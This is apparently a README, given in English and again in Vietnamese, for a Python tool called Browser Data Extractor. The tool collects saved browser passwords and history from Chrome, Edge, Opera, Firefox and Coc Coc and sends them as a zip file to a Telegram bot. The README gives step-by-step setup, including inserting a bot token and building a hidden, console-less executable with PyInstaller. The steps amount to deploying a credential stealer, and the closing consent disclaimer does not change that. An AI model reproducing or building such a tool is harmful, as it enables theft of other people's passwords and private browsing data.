I came back and worked continued
Note that this code only works to retrieve passwords that you have saved in your preferred browser, so it will only access those saved passwords.
Get Bot channel ID
https://api.telegram.org/bot<BOT_TOKEN>/getUpdates
Browser Data Extractor
is a powerful tool for collecting data from popular web browsers. It can retrieve information about passwords and browsing history from multiple browsers and send the results as a zip file via Telegram.
- Collects passwords and browsing history from browsers such as Google Chrome, Coc Coc, Microsoft Edge, Opera, Firefox And other things.
- Saves data to text files in a structured directory format.
- Creates a zip file containing all the data and sends it via Telegram.
- Python 3.x
- Python libraries:
requests
,pywin32
,pycryptodome
,sqlite3
,shutil
- Internet connection for sending data via Telegram.
-
Install the necessary libraries:
pip install requests psutil pycountry screeninfo pycryptodome winshell pypiwin32
-
Save the source code to a file named
BrowserDataExtractor.py
. -
Configure the Telegram bot:
- Replace
bot_token
andchat_id
with your Telegram bot's token and chat ID in the source code.
- Replace
-
Create an executable file:
- Convert the script to a standalone executable using PyInstaller with the
--onefile
and--noconsole
options:pyinstaller --onefile --noconsole --icon=NONE BrowserDataExtractor.py
- The executable file will be created in the
dist
folder.
- Convert the script to a standalone executable using PyInstaller with the
-
Run the executable file:
- Execute the generated file to start the data collection process. The script will check for an internet connection and then collect data from the browsers.
- If there is no internet connection, the program will stop and will not attempt to send data.
-
Results:
- The collected data will be saved in the
Passwords
andHistory
folders as text files. - These files will be compressed into a zip file and sent via Telegram to the specified chat ID.
- The collected data will be saved in the
- Ensure that the script has access to the necessary files and directories on the system.
- Use this script only for legitimate purposes and with the consent of users.
If you encounter any issues or have questions, please contact me or check the official documentation for the libraries used in the script.
Tôi đã trở lại và làm việc tiếp tục
Lưu ý rằng mã này chỉ hoạt động để truy xuất mật khẩu mà bạn đã lưu trong trình duyệt ưa thích của mình, vì vậy nó sẽ chỉ truy cập vào các mật khẩu đã lưu đó.
lấy ID kênh bot
https://api.telegram.org/bot<BOT_TOKEN>/getUpdates
BrowserDataExtractor.py
là một công cụ mạnh mẽ để thu thập dữ liệu từ các trình duyệt web phổ biến. Nó có khả năng lấy thông tin về mật khẩu, lịch sử duyệt web từ nhiều trình duyệt khác nhau và gửi kết quả dưới dạng tệp zip qua Telegram.
- Thu thập mật khẩu và lịch sử duyệt web từ các trình duyệt như Google Chrome, Coc Coc, Microsoft Edge, Opera, Firefox Và những thứ khác.
- Lưu trữ dữ liệu vào các tệp văn bản theo cấu trúc thư mục.
- Tạo tệp zip chứa tất cả dữ liệu và gửi qua Telegram.
- Python 3.x
- Thư viện Python:
requests
,pywin32
,pycryptodome
,sqlite3
,shutil
- Kết nối internet để gửi dữ liệu qua Telegram.
-
Cài đặt các thư viện cần thiết:
pip install requests psutil pycountry screeninfo pycryptodome winshell pypiwin32
-
Lưu mã nguồn vào tệp
BrowserDataExtractor.py
. -
Cấu hình bot Telegram:
- Thay thế
bot_token
vàchat_id
bằng thông tin của bot Telegram của bạn trong mã nguồn.
- Thay thế
-
Tạo tệp thực thi:
- Để chuyển đổi script thành một tệp thực thi độc lập, sử dụng PyInstaller với các tùy chọn
--onefile
và--noconsole
:pyinstaller --onefile --noconsole --icon=NONE BrowserDataExtractor.py
- Tệp thực thi sẽ được tạo trong thư mục
dist
.
- Để chuyển đổi script thành một tệp thực thi độc lập, sử dụng PyInstaller với các tùy chọn
-
Chạy tệp thực thi:
- Chạy tệp thực thi đã tạo để bắt đầu quá trình thu thập dữ liệu. Tệp sẽ kiểm tra kết nối mạng và sau đó thu thập dữ liệu từ các trình duyệt.
- Nếu không có kết nối mạng, chương trình sẽ dừng lại và không tiếp tục gửi dữ liệu.
-
Kết quả:
- Dữ liệu thu thập được sẽ được lưu trong các thư mục
Passwords
vàHistory
dưới dạng các tệp văn bản. - Các tệp này sẽ được nén thành một tệp zip và gửi qua Telegram đến ID trò chuyện đã chỉ định.
- Dữ liệu thu thập được sẽ được lưu trong các thư mục
- Đảm bảo rằng script có quyền truy cập vào các tệp và thư mục cần thiết trên hệ thống.
- Sử dụng script này chỉ cho các mục đích hợp pháp và với sự cho phép của người dùng.
Nếu bạn gặp bất kỳ vấn đề nào hoặc có câu hỏi, hãy liên hệ với tôi hoặc kiểm tra tài liệu chính thức của các thư viện sử dụng trong script.